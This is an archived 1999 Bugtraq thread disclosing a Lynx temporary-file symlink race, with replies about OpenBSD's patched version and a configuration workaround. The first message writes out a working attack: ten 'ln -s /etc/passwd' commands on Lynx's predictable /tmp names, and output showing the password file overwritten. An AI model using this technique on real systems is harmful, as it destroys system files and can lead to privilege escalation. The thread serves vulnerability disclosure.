Lynx /tmp bug involving symlinks can lead to local root compromise.
a6b28927f7725cb5e7841faa2bb5111e32452c91664008bad5d0baa2ce7ea8df
Date: Tue, 9 Feb 1999 20:57:30 -0500
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@netspace.org
Subject: Lynx /tmp problem
Hi Aleph,
please filter this if already posted....
------
Hello....
I have found a bug in Lynx all versions, except the latest stable
release...
lynx create temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the proc number in the machine
x is a number from 0 to 9
if i run lynx like any user, for example root we see this
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
then the files in /tmp created by lynx will be..
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
if i make a symlink
>from all of this files to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...
for example i got this in my system...
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
like you see, the file is lost now...
this bug is lynx specific, so all OS are vulnerables..
Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...
i hope it is already fixed, creating 100 symlinks are not to hard :)
the lynx team know this yet.
by...
Juan Diego
---------------------------------------------------------------------------
Date: Thu, 11 Feb 1999 12:55:41 -0700
From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem
> this bug is lynx specific, so all OS are vulnerables..
OpenBSD ships with an integrated version of lynx. Our version has
tweaks to avoid this issue.
We've brought this issue up with the lynx people before. They do not
appear to give a damn.
That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix. Lynx's
handling of /tmp is wrought with many races, and the code is pasta.
---------------------------------------------------------------------------
Date: Fri, 12 Feb 1999 08:47:00 +0000
From: Glynn Clements <glynn@SENSEI.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem
Juan Diego Bolanos wrote:
> Hi Aleph,
> please filter this if already posted....
The fact that lynx has potential /tmp problems was discussed last
March:
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject: Another day, another race - lynx 2.7.1
Date: Tue, 17 Mar 1998 15:39:58 +0100
Message-ID: <Pine.LNX.3.96.980317152338.14878A-100000@genome>
> I have found a bug in Lynx all versions, except the latest stable
> release...
>
> lynx create temporary files in /tmp in this way....
[details of your average /tmp problem snipped].
>From the INSTALLATION file:
The environment variable "LYNX_TEMP_SPACE", if set, will override the
default path prefix for temporary files that was defined via the constant
"TEMP_SPACE" in userdefs.h. See userdefs.h for more information.
--
Glynn Clements <glynn@sensei.co.uk>